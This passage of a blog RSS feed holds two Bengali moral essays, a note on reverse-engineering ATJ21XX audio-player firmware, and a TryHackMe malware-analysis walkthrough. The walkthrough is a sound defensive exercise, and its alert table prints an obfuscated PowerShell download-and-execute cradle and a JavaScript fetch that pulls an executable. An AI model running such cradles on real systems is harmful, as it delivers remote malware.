যতটুকু প্রাপ্য ঠিক ততটুকুই সম্মান দিন, তার বিন্দু বেশি নয়। &#xA;&#xA;কারণ অতিরিক্ত সম্মান আসলে সম্মান নয়, এটি একটি ধীরগতির বিষ, একটি দীর্ঘমেয়াদি অভিশাপ। এই অভিশাপ মানুষকে নিজের অজান্তেই, ধীরে ধীরে, অত্যন্ত নিপুণভাবে অন্য একটি প্রাণীতে রূপান্তরিত করে।&#xA;এবং সেই প্রাণীটির নাম ইতোমধ্যে উল্লেখ করা হয়েছে।&#xA;&#xA;~ বাস্তবতার ঘটনাপ্রবাহ ছেঁকে সংগৃহীত]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://images2.imgbox.com/ce/16/IR76M2H8_o.jpg" alt=" "></p>

<p>মানুষ ঠিক ততটুকুই সম্মানেই সবচেয়ে মানবিক থাকে, যতটুকু তার প্রাপ্য। এর বেশি দিলেই বিপদ। এটি কোনো দার্শনিক অনুমান নয়, এটি জীবনের ঘটনাপ্রবাহকে নিবিড় পর্যবেক্ষণ করে পাওয়া একটি অকাট্য সত্য।</p>

<p>অতিরিক্ত সম্মান মানুষের মস্তিষ্কে এক বিচিত্র রাসায়নিক বিক্রিয়া ঘটায়। প্রথমে সে এই অযাচিত সম্মান পেয়ে একটু অবাক হয়, তারপর তাতে অভ্যস্ত হয়ে উঠে, এবং তারপর- এটাই সবচেয়ে বিপজ্জনক ধাপ; সে ধরেই নেয় যে এটাই তার ন্যায্য প্রাপ্য ছিল!!</p>



<p>এই উপলব্ধির পর থেকে সে হঠাৎ আবিষ্কার করে যে তার মতামত অমোঘ, তার রুচি অতুলনীয়, এবং পৃথিবীর বাকি সবাই মূলত তার জ্ঞানের অপেক্ষায় ক্ষুদ্র, তুচ্ছ, অতিনগণ্য। এরপর থেকে সে আর মানুষের মতো আচরণ করে না; সে আচরণ করে একজন রাজকীয় ছাগলের মতো। যেদিকে খুশি যায়, যা খুশি বলে, যা খুশি করে, যা খুশি তাতে মুখ লাগায়, যা খুশি তাই খায়, আর কেউ সামান্য বাধা দিলে উলটো শিং নাড়িয়ে তেড়ে আসে।</p>

<p>এখন স্বাভাবিক প্রশ্ন হলো, এই অবস্থা থেকে পরিত্রাণের উপায় কী?</p>

<p>একটাই উপায় তার, তা হলো &#39;সম্মান প্রত্যাহার&#39;।
কিন্তু সেটি ধীরে ধীরে করলে কাজ হয় না, কারণ মানুষ নিজের সম্মান হারানোর ব্যাপারে অত্যন্ত সৃজনশীল(!)। প্রতিটি ধাপে সে নতুন ব্যাখ্যা দাঁড় করায়। সে ভাবে এবং বলে- “ওরা আসলে আমাকে বোঝে না”, “ওরা হিংসুটে, আমাকে হিংসা করে”, “ওরা আমার কদর বুঝলো না”, “আমি যে ওদের জন্য কী করেছি তা ওরা বুঝলো না”, কিংবা “এই যুগ/লোকগুলো আমার উপযুক্ত নয়”। এমনকি প্রয়োজনে সে ইতিহাসের দুই-একজন মহামানবের সাথে নিজের তুলনাও টেনে বসে, কারণ তারাও নাকি জীবদ্দশায় স্বীকৃতি পাননি। এই জাতীয় দার্শনিক সান্ত্বনা সে নিজেই নিজেকে অবিরাম দিতে থাকে, এবং ছাগলামি নির্বিঘ্নে অব্যাহত রাখে।</p>

<p>সম্মান পুরোপুরি শূন্য না হওয়া পর্যন্ত এই প্রক্রিয়া থামে না। শূন্যের কোঠায় এসে সে কিছুটা থমকায়, চারদিকে তাকায়, এবং ধীরে ধীরে আবার মানুষ হওয়ার চেষ্টা শুরু করে। তখন অবশ্য অনেক দেরি হয়ে যায়, এবং দর্শকরাও ততদিনে তাকে ছেড়ে চলে গিয়ে থাকে।</p>

<p>তাই কাউকে সত্যিকার অর্থে শ্রদ্ধা করলে, তাকে যতটুকু প্রাপ্য ঠিক ততটুকুই সম্মান দিন, তার বিন্দু বেশি নয়।</p>

<p>কারণ অতিরিক্ত সম্মান আসলে সম্মান নয়, এটি একটি ধীরগতির বিষ, একটি দীর্ঘমেয়াদি অভিশাপ। এই অভিশাপ মানুষকে নিজের অজান্তেই, ধীরে ধীরে, অত্যন্ত নিপুণভাবে অন্য একটি প্রাণীতে রূপান্তরিত করে।
এবং সেই প্রাণীটির নাম ইতোমধ্যে উল্লেখ করা হয়েছে।</p>

<p>~ বাস্তবতার ঘটনাপ্রবাহ ছেঁকে সংগৃহীত</p>
]]></content:encoded>
      <author>লোকমানুষ এর ব্লগ</author>
      <guid>https://infosec.press/read/a/0t4relf8er</guid>
      <pubDate>Sun, 15 Mar 2026 18:00:00 +0000</pubDate>
    </item>
    <item>
      <title>Shadow Trace - TryHackMe Defensive Security Challenge</title>
      <link>https://infosec.press/plutogazer/shadow-trace-tryhackme-defensive-security-challenge</link>
      <description>&lt;![CDATA[This is a Walkthrough for the Shadow Trace Windows Malware Analysis TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer - if needed - for those interested in finding out more about the solution to a specific task.&#xA;&#xA;Introduction&#xA;The description of the room is the following:&#xA;blockquote&#xA;Analyse a suspicious file, uncover hidden clues, and trace the source of the infection./blockquote&#xA;&#xA;A quite short room, Shadow Trace has two sections: File Analysis and Alert analysis. It focuses on static malware analysis, making us analyse a file to identify its behavior, data, and gather potential Indicators of Compromise, and on alerts related to a potential Living Off the Land attack, making us use our knowledge on normal behavior of trusted tools.&#xA;&#xA;Do note that all URLs have been defanged.&#xA;Task 1: File Analysis&#xA;The machine in question contains several DFIR tools. For this task I decided to use PE Bear (a PE File Header analyzer) and CAPA (which needs to be added to the Windows Environment Variables to use). The file in question is called windows-update.exe&#xA;&#xA;What is the architecture of the binary file windows-update.exe?&#xA;&#xA;On PE Bear, we head to the &#34;File Hdr&#34; tab -  Machine -  Meaning. We see AMD64. The answer is:&#xA;blockquote&#xA;64-bit&#xA;/blockquote&#xA;Alternatively, using CAPA: In the &#34;arch&#34; value it says AMD64 as well.&#xA;&#xA;What is the hash (sha-256) of the file windows-update.exe?&#xA;It can be easily found both in PE Bear and CAPA:&#xA;b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc&#xA;&#xA;Identify the URL within the file to use it as an IOC&#xA;&#xA;For this, we need to check strings within the file. PE-Header has a section for this as well.&#xA;Scrolling down the strings tab, we will eventually find the URL the file was downloaded from:&#xA;blockquote&#xA;hxxp[://]tryhatme[.]com/update/security-update[.]exe&#xA;/blockquote&#xA;&#xA;With the URL identified, can you spot a domain that can be used as an IOC?&#xA;&#xA;Around string 121, we see that it tries to connect to a SMTP server, eventually making a connection to a specific domain, right before trying to open the \etc\hosts file. We know the hosts file maps IP addresses to hostnames, so it must be around here. The domain the file tries to connect to is:&#xA;blockquote&#xA;responses.tryhatme.com&#xA;/blockquote&#xA;&#xA;Input the decoded flag from the suspicious domain&#xA;&#xA;In previous strings (specifically, string 110), we see an attempt to download from a domain with a path that appears to be encoded using base-64:&#xA;tryhatme.com/VEhNe3lvdV9nMHRfc29tZV9JT0NzX2ZyaWVuZH0=&#xA;&#xA;Decoding the path from Base-64 will result in the flag.&#xA;&#xA;What library related to socket communication is loaded by the binary?&#xA;&#xA;This is asking us about loading a library, which means it is in the imports section of the PE Header. The malware imports several of them, so it will take some investigation. &#xA;After researching online, the only one among the ones the malware uses who calls sockets is:&#xA;blockquote&#xA;WS232.dll&#xA;/blockquote&#xA;Task 2: Alert Analysis&#xA;This task is not directly related to the previous one. We are provided a view of an EDR agent with two alerts. We must use our knowledge of what is expected system behavior to answer these. The alerts are the following:&#xA;&#xA;| Time                  | Command                                                                                                                                                                                                                                                                                                                                                                                                                                               | Severity | Rule                            | Host                                    | Process                               |&#xA;| --------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ------------------------------- | ------------------------------------------- | ----------------------------------------- |&#xA;| Mar 7th 2026 at 14:10 | (new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(&#34;aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl&#34;))) \| IEX;                                                                                                                                                                                                                                                                                | Critical | Suspicious PowerShell execution | WIN-SRV-01.tryhackme.local / CORPsvcbackup | powershell.exe                            |&#xA;| Mar 7th 2026 at 15:10 | fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=  String.fromCharCode(c)).join(&#39;&#39;)).then(r=  r.blob()).then(b=  {const u=URL.createObjectURL(b);const a=document.createElement(&#39;a&#39;);a.href=u;a.download=&#39;test.txt&#39;;document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);}); | Critical | Suspicious Browser Download     | WIN-SRV-01.tryhackme.local / CORPsvc_backup | chrome.exe (browser JavaScript execution) |&#xA;&#xA;Can you identify the malicious URL from the trigger by the process powershell.exe?&#xA;&#xA;At the beginning of the PowerShell command, we see a system called named &#34;system.net.webclient&#34; and then DownloadString. As the name implies, it is establishing a connection to a web client to download a file whose path is indicated inside the DownloadStrings parameter. And near the end of the command, we see the words &#34;Convert&#34; and &#34;FromBase64String&#34;. The string between these parenthesis is the URL, Base-64 encoded.&#xA;&#xA;Once decoded, we get the answer:&#xA;blockquote&#xA;hxxps[://]tryhatme[.]com/dev/main[.]exe&#xA;/blockquote&#xA;&#xA;Can you identify the malicious URL from the alert triggered by chrome.exe?&#xA;&#xA;For the second alert, we see the fetch JavaScript function, and later in the command we see that it is transforming the object obtained by fetch into an URL, and downloading from it.&#xA;&#xA;Because that is definitely not an URL, we can assume it is encoded.&#xA;Its encoding algorithm is Decimal.&#xA;Once decoded, we get our answer.&#xA;blockquote&#xA;hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe&#xA;/blockquote&#xA;&#xA;Note: if you do not know the encoding algorithm used, some tools like CyberChef provide a &#34;detect encoding algorithm&#34; functionality as well as the expected encoding/decoding ones. For CyberChef, this is called the &#34;Magic&#34; algorithm, which provides several guesses at what the encoding algorithm might be.&#xA;&#xA;What&#39;s the name of the file saved in the alert triggered by chrome.exe?&#xA;The command has the following section: &#34;download=test.txt&#34;. This is the command telling the browser what to download the file as. Hence, the answer is:&#xA;blockquote&#xA;test.txt&#xA;/blockquote&#xA;&#xA;b style=&#34;color:darkgreen&#34;Congratulations!/b The room is finished.&#xA;br&#xA;Conclusion&#xA;While a particularly short room, it was definitely an educational one. I had never done malware analysis like this before, despite static analysis being an important part of the responsibilities of a Blue Team member. I had the chance to finally use tools like PE Header analyzers or CAPA on actually malicious files, and put my knowledge on expected system behavior (in this case, PowerShell) to the test!&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>This is a Walkthrough for the <a href="https://tryhackme.com/room/shadowtrace" rel="nofollow">Shadow Trace</a> Windows Malware Analysis <a href="https://tryhackme.com" rel="nofollow">TryHackMe</a> challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer – if needed – for those interested in finding out more about the solution to a specific task.</p>

<h3 id="introduction">Introduction</h3>

<p>The description of the room is the following:
<blockquote>Analyse a suspicious file, uncover hidden clues, and trace the source of the infection.</blockquote></p>

<p>A quite short room, Shadow Trace has two sections: <strong>File Analysis</strong> and <strong>Alert analysis</strong>. It focuses on <strong>static malware analysis</strong>, making us analyse a file to identify its behavior, data, and gather potential Indicators of Compromise, and on alerts related to a potential <strong>Living Off the Land</strong> attack, making us use our knowledge on normal behavior of trusted tools.</p>

<p>Do note that all URLs have been defanged.</p>

<h3 id="task-1-file-analysis">Task 1: File Analysis</h3>

<p>The machine in question contains several DFIR tools. For this task I decided to use <strong>PE Bear</strong> (a PE File Header analyzer) and <strong>CAPA</strong> (which needs to be added to the Windows Environment Variables to use). The file in question is called <strong>windows-update.exe</strong></p>

<h4 id="what-is-the-architecture-of-the-binary-file-windows-update-exe">What is the architecture of the binary file windows-update.exe?</h4>

<p>On PE Bear, we head to the “File Hdr” tab –&gt; Machine –&gt; Meaning. We see <strong>AMD64</strong>. The answer is:
<blockquote>64-bit
</blockquote>
Alternatively, using CAPA: In the “arch” value it says AMD64 as well.</p>

<h4 id="what-is-the-hash-sha-256-of-the-file-windows-update-exe">What is the hash (sha-256) of the file windows-update.exe?</h4>

<p>It can be easily found both in PE Bear and CAPA:</p>

<pre><code>b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc
</code></pre>

<h4 id="identify-the-url-within-the-file-to-use-it-as-an-ioc">Identify the URL within the file to use it as an IOC</h4>

<p>For this, we need to check <strong>strings</strong> within the file. PE-Header has a section for this as well.
Scrolling down the strings tab, we will eventually find the URL the file was downloaded from:
<blockquote>hxxp[://]tryhatme[.]com/update/security-update[.]exe
</blockquote></p>

<h4 id="with-the-url-identified-can-you-spot-a-domain-that-can-be-used-as-an-ioc">With the URL identified, can you spot a domain that can be used as an IOC?</h4>

<p>Around string 121, we see that it tries to connect to a SMTP server, eventually making a connection to a specific domain, right before trying to open the \etc\hosts file. We know the hosts file maps IP addresses to hostnames, so it must be around here. The domain the file tries to connect to is:
<blockquote>responses.tryhatme.com
</blockquote></p>

<h4 id="input-the-decoded-flag-from-the-suspicious-domain">Input the decoded flag from the suspicious domain</h4>

<p>In previous strings (specifically, string 110), we see an attempt to download from a domain with a path that appears to be encoded using base-64:</p>

<pre><code>tryhatme.com/VEhNe3lvdV9nMHRfc29tZV9JT0NzX2ZyaWVuZH0=
</code></pre>

<p>Decoding the path from Base-64 will result in the flag.</p>

<h4 id="what-library-related-to-socket-communication-is-loaded-by-the-binary">What library related to socket communication is loaded by the binary?</h4>

<p>This is asking us about loading a library, which means it is in the <strong>imports</strong> section of the PE Header. The malware imports several of them, so it will take some investigation.
After researching online, the only one among the ones the malware uses who calls sockets is:
<blockquote>WS2_32.dll
</blockquote></p>

<h3 id="task-2-alert-analysis">Task 2: Alert Analysis</h3>

<p>This task is not directly related to the previous one. We are provided a view of an EDR agent with two alerts. We must use our knowledge of what is expected system behavior to answer these. The alerts are the following:</p>

<table>
<thead>
<tr>
<th>Time</th>
<th>Command</th>
<th>Severity</th>
<th>Rule</th>
<th><strong>Host</strong></th>
<th><strong>Process</strong></th>
</tr>
</thead>

<tbody>
<tr>
<td>Mar 7th 2026 at 14:10</td>
<td>(new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(“aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl”))) | IEX;</td>
<td>Critical</td>
<td>Suspicious PowerShell execution</td>
<td>WIN-SRV-01.tryhackme.local / CORPsvc_backup</td>
<td>powershell.exe</td>
</tr>

<tr>
<td>Mar 7th 2026 at 15:10</td>
<td>fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=&gt;String.fromCharCode©).join(&#39;&#39;)).then(r=&gt;r.blob()).then(b=&gt;{const u=URL.createObjectURL(b);const a=document.createElement(&#39;a&#39;);a.href=u;a.download=&#39;test.txt&#39;;document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);});</td>
<td>Critical</td>
<td>Suspicious Browser Download</td>
<td>WIN-SRV-01.tryhackme.local / CORPsvc_backup</td>
<td>chrome.exe (browser JavaScript execution)</td>
</tr>
</tbody>
</table>

<h4 id="can-you-identify-the-malicious-url-from-the-trigger-by-the-process-powershell-exe">Can you identify the malicious URL from the trigger by the process powershell.exe?</h4>

<p>At the beginning of the PowerShell command, we see a system called named “<strong>system.net.webclient</strong>” and then <strong>DownloadString</strong>. As the name implies, it is establishing a connection to a web client to download a file whose path is indicated inside the DownloadStrings parameter. And near the end of the command, we see the words “<strong>Convert</strong>” and “<strong>FromBase64String</strong>”. The string between these parenthesis is the URL, Base-64 encoded.</p>

<p>Once decoded, we get the answer:
<blockquote>hxxps[://]tryhatme[.]com/dev/main[.]exe
</blockquote></p>

<h4 id="can-you-identify-the-malicious-url-from-the-alert-triggered-by-chrome-exe">Can you identify the malicious URL from the alert triggered by chrome.exe?</h4>

<p>For the second alert, we see the <strong>fetch</strong> JavaScript function, and later in the command we see that it is transforming the object obtained by fetch into an URL, and downloading from it.</p>

<p>Because that is definitely not an URL, we can assume it is encoded.
Its encoding algorithm is <strong>Decimal</strong>.
Once decoded, we get our answer.
<blockquote>hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe
</blockquote></p>

<p><strong>Note:</strong> if you do not know the encoding algorithm used, some tools like CyberChef provide a “detect encoding algorithm” functionality as well as the expected encoding/decoding ones. For CyberChef, this is called the “Magic” algorithm, which provides several guesses at what the encoding algorithm might be.</p>

<h4 id="what-s-the-name-of-the-file-saved-in-the-alert-triggered-by-chrome-exe">What&#39;s the name of the file saved in the alert triggered by chrome.exe?</h4>

<p>The command has the following section: “<strong>download=test.txt</strong>”. This is the command telling the browser what to download the file as. Hence, the answer is:
<blockquote>test.txt
</blockquote></p>

<p><b style="color:darkgreen">Congratulations!</b> The room is finished.
<br></p>

<h3 id="conclusion">Conclusion</h3>

<p>While a particularly short room, it was definitely an educational one. I had never done malware analysis like this before, despite static analysis being an important part of the responsibilities of a Blue Team member. I had the chance to finally use tools like PE Header analyzers or CAPA on actually malicious files, and put my knowledge on expected system behavior (in this case, PowerShell) to the test!</p>
]]></content:encoded>
      <author>plutogazer writeups</author>
      <guid>https://infosec.press/read/a/r0h3dyb76u</guid>
      <pubDate>Mon, 09 Mar 2026 22:42:40 +0000</pubDate>
    </item>
    <item>
      <title>More ATJ21XX stuff</title>
      <link>https://infosec.press/tildavaan/more-atj21xx-stuff</link>
      <description>&lt;![CDATA[I would like to report on what we have learned during our research into ATJ21XX-SoCs.&#xA;&#xA;Have you ever come across a device such as AGPTEK, WOLFANG, YOTON, or RUIZU? These devices seem to all be built by the same company. All of them support MP3/OGG/FLAC/AAC/APE formats, have the &#xA;same menu structures, and sometimes even may be capable of playing videos or count your steps.&#xA;&#xA;We have confirmed that RUIZU and AGPTEK are the same company. That&#39;s written right on the box, but many other players use the same chip, the ATJ2157 from Actions Semiconductor. These OEMs do not start with just the data sheet but instead use an SDK based on uC/OS-II.&#xA;&#xA;It is unfortunate that some of these devices are built so cheap - low-speed memory, a poor FM tuner, and random glitches in the OEM operating system lead to devices with little polish, given that these chips are very powerful.&#xA;&#xA;ATJ212X are MIPS-based and were found in your SanDisk Clip Sport and Jam devices as well as the RUIZU X02 (see Ruizu X02 Partial Disassembly and Notes). The data sheet &#xA;calls the available SRAM &#34;from ten to several hundred KB&#34;.&#xA;&#xA;ATJ215X are ARM Cortex M4F-based and are now used in almost all &#34;budget&#34; devices. CPU runs at 288MHz and has only 224KB RAM. This is less than the Raspberry Pi RP2040 with 256K.&#xA;&#xA;These chips are all-in-one SoCs - lithium-ion battery protection, microphone input, USB 2.0 interface, SPI and SD interfaces, NOR/NAND flash controller, many GPIO pins, stereo headphone output for headphones, I²S up to 192kHz.&#xA;&#xA;The SDK for the MIPS version was leaked - https://github.com/Suber/PD196ATJ2127, and we can look into the wonders of UI built on an RTOS. Apart from data sheets and pinouts, we have found nothing for the ARM variant, which is unfortunate. We can buy chips on Alibaba, maybe then we can get SDK?&#xA;&#xA;With such a rich set of supported media and so much versatility in a small package, an open SDK would allow users to address various software shortcomings with these devices (such as the strange fonts I mentioned earlier) or issues related to metadata processing where file &#xA;names and order are incorrectly displayed.&#xA;&#xA;So far, we have only been able to correct font types and adjust embedded string entries in the .STY files. While searching for information online, we found some repositories dealing with the device flashing process:&#xA;&#xA;https://github.com/nfd/atj2127decrypt (Re-implementing the flash process)&#xA;https://github.com/Rockbox/rockbox (Implementing unpacking with atjboottool)&#xA;&#xA;People from Rockbox have checked whether a custom operating system can be integrated into https://forums.rockbox.org/index.php?topic=51281.0, but 200K is simply too small.&#xA;&#xA;We also found some people selling proprietary Actions Semiconductor firmware tools for ATJ2127 on a Chinese website that we do not want to include here, but you can find them.&#xA;&#xA;Looking for ADFUS.BIN? PD196ATJ2127 has ADFUS.BIN inside case/fwpkg/US212ADEMO.fw sqlite3 database after you decrypt it with atjboottool for ATJ2127 and the ARM version of ADFUS.BIN is in all ATJ2157 firmwares you can download from RUIZU, AGPTEK etc.&#xA;&#xA;SELECT writefile(FileName, File) FROM FileTable WHERE FileName = &#39;ADFUS.BIN&#39;;&#xA;&#xA;Updates:&#xA;&#xA;Somebody got much further than us with arbitrary code execution - https://www.reddit.com/r/hacking/comments/1hss4k3/ifinallygotarbitrarycoderunningonruizux02/ and patched AP - https://gitlab.com/reverse2682701/ruizu-x02-rev&#xA;A post showing how to flash SanDisk Sport using reverse-engineered Actions Media Tool scripts from the repo we linked earlier - https://gist.github.com/roman-yepishev/737dfda3a0a853fe730286d3ce49fccd. The author links to a reverse-engineered ADFUS.BIN but you don&#39;t have to do that - take PD196_ATJ2127 version.]]&gt;</description>
      <content:encoded><![CDATA[<p>I would like to report on what we have learned during our research into ATJ21XX-SoCs.</p>

<p>Have you ever come across a device such as AGPTEK, WOLFANG, YOTON, or RUIZU? These devices seem to all be built by the same company. All of them support MP3/OGG/FLAC/AAC/APE formats, have the
same menu structures, and sometimes even may be capable of playing videos or count your steps.</p>

<p>We have confirmed that RUIZU and AGPTEK are the same company. That&#39;s written right on the box, but many other players use the same chip, the ATJ2157 from Actions Semiconductor. These OEMs do not start with just the data sheet but instead use an SDK based on <a href="https://osrtos.com/rtos/uc-os-ii/" rel="nofollow">uC/OS-II</a>.</p>

<p>It is unfortunate that some of these devices are built so cheap – low-speed memory, a poor FM tuner, and random glitches in the OEM operating system lead to devices with little polish, given that these chips are very powerful.</p>
<ul><li><p>ATJ212X are MIPS-based and were found in your SanDisk Clip Sport and Jam devices as well as the RUIZU X02 (see <a href="https://www.audiosciencereview.com/forum/index.php?threads/ruizu-x02-partial-disassembly-and-notes.7697/" rel="nofollow">Ruizu X02 Partial Disassembly and Notes</a>). The data sheet
calls the available SRAM “from ten to several hundred KB”.</p></li>

<li><p>ATJ215X are ARM Cortex M4F-based and are now used in almost all “budget” devices. CPU runs at 288MHz and has only 224KB RAM. This is less than the Raspberry Pi RP2040 with 256K.</p></li></ul>

<p>These chips are all-in-one SoCs – lithium-ion battery protection, microphone input, USB 2.0 interface, SPI and SD interfaces, NOR/NAND flash controller, many GPIO pins, stereo headphone output for headphones, I²S up to 192kHz.</p>

<p>The SDK for the MIPS version was leaked – <a href="https://github.com/Suber/PD196_ATJ2127" rel="nofollow">https://github.com/Suber/PD196_ATJ2127</a>, and we can look into the wonders of UI built on an RTOS. Apart from data sheets and pinouts, we have found nothing for the ARM variant, which is unfortunate. We can buy chips on Alibaba, maybe then we can get SDK?</p>

<p>With such a rich set of supported media and so much versatility in a small package, an open SDK would allow users to address various software shortcomings with these devices (such as the strange fonts I mentioned earlier) or issues related to metadata processing where file
names and order are incorrectly displayed.</p>

<p>So far, we have only been able to correct font types and adjust embedded string entries in the .STY files. While searching for information online, we found some repositories dealing with the device flashing process:</p>
<ul><li><a href="https://github.com/nfd/atj2127decrypt" rel="nofollow">https://github.com/nfd/atj2127decrypt</a> (Re-implementing the flash process)</li>
<li><a href="https://github.com/Rockbox/rockbox" rel="nofollow">https://github.com/Rockbox/rockbox</a> (Implementing unpacking with atjboottool)</li></ul>

<p>People from Rockbox have checked whether a custom operating system can be integrated into <a href="https://forums.rockbox.org/index.php?topic=51281.0" rel="nofollow">https://forums.rockbox.org/index.php?topic=51281.0</a>, but 200K is simply too small.</p>

<p>We also found some people selling proprietary Actions Semiconductor firmware tools for ATJ2127 on a Chinese website that we do not want to include here, but you can find them.</p>

<p>Looking for ADFUS.BIN? PD196<em>ATJ2127 has ADFUS.BIN inside case/fwpkg/US212A</em>DEMO.fw sqlite3 database after you decrypt it with atjboottool for ATJ2127 and the ARM version of ADFUS.BIN is in all ATJ2157 firmwares you can download from RUIZU, AGPTEK etc.</p>

<pre><code>SELECT writefile(FileName, File) FROM FileTable WHERE FileName = &#39;ADFUS.BIN&#39;;
</code></pre>

<p>Updates:</p>
<ol><li>Somebody got much further than us with arbitrary code execution – <a href="https://www.reddit.com/r/hacking/comments/1hss4k3/i_finally_got_arbitrary_code_running_on_ruizu_x02/" rel="nofollow">https://www.reddit.com/r/hacking/comments/1hss4k3/i_finally_got_arbitrary_code_running_on_ruizu_x02/</a> and patched AP – <a href="https://gitlab.com/reverse2682701/ruizu-x02-rev" rel="nofollow">https://gitlab.com/reverse2682701/ruizu-x02-rev</a></li>
<li>A post showing how to flash SanDisk Sport using reverse-engineered Actions Media Tool scripts from the repo we linked earlier – <a href="https://gist.github.com/roman-yepishev/737dfda3a0a853fe730286d3ce49fccd" rel="nofollow">https://gist.github.com/roman-yepishev/737dfda3a0a853fe730286d3ce49fccd</a>. The author links to a reverse-engineered ADFUS.BIN but you don&#39;t have to do that – take PD196_ATJ2127 version.</li></ol>
]]></content:encoded>
      <author>Tom Tildavaan</author>
      <guid>https://infosec.press/read/a/vjlxsca2a2</guid>
      <pubDate>Sun, 08 Mar 2026 22:27:25 +0000</pubDate>
    </item>
    <item>
      <title>জীবনের জটিল সমীকরণঃ সফলতার ভ্রম ও বাস্তবতা</title>
      <link>https://infosec.press/lokmanus/jiibner-jttil-smiikrnnh-sphltaar-bhrm-o-baastbtaa</link>
      <description>&lt;![CDATA[ &#xA;&#xA;⠀⠀&#xA;আমরা সাধারণত চোখের সামনে যা দেখি, তাকেই সত্য ধরে নিই। আজ কার লাভ হলো, কে উন্নতি করল, কে ক্ষমতার চেয়ারে বসল -এসব দিয়েই আমরা সফলতা আর ব্যর্থতার বিচার করি। অথচ জীবন এত সরল নয়। জীবনের হিসাব অনেক গভীর, অনেক বিস্তৃত। এখানে সময়ের সাথে সাথে জীবনের সমীকরণ বদলায়, আরও বদলে যায় সফলতার সংজ্ঞা।&#xA;&#xA;একদিন তাড়াহুড়ো করে বাসে উঠতে গিয়ে বাদামের ঝুড়ি হাতে রফিক মিয়া হোঁচট খেয়ে পড়ে গেল। ঠিক সেই মুহূর্তে ট্র্যাফিক ছেড়ে দেওয়ায় কয়েকটি গাড়ির চাকার নিচে পিষ্ট হলো তার সারা দিনের পুঁজি -বাদামের ঝুড়ি। মুহূর্তেই শেষ হয়ে গেল তার রুজি-রুটি। অসহায় মুখ নিয়ে দাঁড়িয়ে রইল সে। &#xA;&#xA;!--more--&#xA;&#xA;অন্যদিকে একই রুটে বাদাম বিক্রি করা শফিক মিয়ার সেদিন দারুণ লাভ হলো। রফিক না থাকায় দ্বিগুণ বিক্রি করল সে। হাতে এলো ভালো অঙ্কের টাকা। আপাতদৃষ্টিতে ঐদিনের জন্য শফিক হলো সফল, আর রফিক হলো ব্যর্থ, নিঃস্ব একজন। কিন্তু সন্ধ্যায় সারা দিনের আয় নিয়ে শফিক বসে গেল জুয়ার আসরে। রাত শেষ হতেই উপার্জিত সব টাকা হারিয়ে সেও শূন্যে নেমে এলো। সকালে দেখা গেল- রফিক আর শফিক দুজনকেই আবার শূন্য শুরু করতে হবে। তবে পার্থক্য এক জায়গায়। &#xA;&#xA;রফিক মিয়া ছিল সৎ, ভদ্র ও পরিশ্রমী মানুষ। সবাই তাকে বিশ্বাস করত। তাই সে যখন নতুন করে ব্যাবসা শুরু করতে চাইল, তখন মানুষ বিনা দ্বিধায় তাকে বাকীতে মাল দিল। মানুষের বিশ্বাসই হয়ে উঠল তার নতুন মূলধন। অন্যদিকে শফিকের জুয়ার নেশা আর অবিশ্বস্ততা কথা সবাই জানত। তাই কেউ তাকে বাকীতে মাল দিতে চাইল না। বিশ্বাসহীন মানুষের জন্য পৃথিবীর কোনো দরজাই কখনো খোলা থাকে না। &#xA;&#xA;⠀⠀&#xA;এবার চলুন আরেকটি গল্প শুনি। গল্পটা সুমন নামের এক অফিসের সহকারী ম্যানেজারের। সারাদিন বসকে তোষামোদ করে সময় কাটাত, আবার আড়ালে তারই বদনাম করে বেড়াত। তবে তার একটা সুপ্ত ও গোপন ইচ্ছা ছিল। ইচ্ছেটি ছিল- কবে বসের চাকরি যাবে আর সে সেই চেয়ারে বসবে। অনেক দিন পর তার সেই চাওয়া পূরণ হলো। তার বস চাকরি ছেড়ে চলে গেল, আর সুমন পদোন্নতি পেয়ে হলো ম্যানেজার। &#xA;&#xA;মানুষের চোখে সে সফল। কিন্তু সফলতা আর ইচ্ছে পূরণ তো আর তার চরিত্র বদলাতে পারে না। আগের মতোই চললল তার অফিস পলিটিক্স, ষড়যন্ত্র, স্বজনপ্রীতি আর তোষামোদের রাজনীতি। ফলে বিশ্বস্ত, কর্মঠ ও যোগ্য কর্মচারীরা একে একে চাকরি ছাড়তে লাগল। শূন্য পদে নিয়োগ পেল অদক্ষ, তেলবাজ ও অনভিজ্ঞ লোকজন। আর এসব কারণে কোম্পানির ক্ষতি বাড়তে থাকল। শেষ পর্যন্ত কর্তৃপক্ষ বাধ্য হয়ে সুমন ও তার গড়া পুরো দলকেই ছাঁটাই করলো। &#xA;&#xA;⠀⠀&#xA;আরও একটি গল্প শোনা যাক। পরীক্ষায় একজন নকল করে ভালো রেজাল্ট করল, আর অন্যজন সততার সাথে পরিশ্রম করে মাঝারি ফল পেল। সবাই প্রথমজনকে মেধাবী বলল। কিন্তু সময়ের সাথে দেখা গেল- নকলের সাফল্য টেকেনি, আর পরিশ্রমী মানুষটি ধীরে ধীরে জীবনে অনেক দূর এগিয়ে গেছে। &#xA;&#xA;এই গল্পগুলো আমাদের চারপাশে ঘটে চলেছে। গল্প গুলো আমাদের শেখায়- সফলতা একদিনের অর্জন নয়, এটি 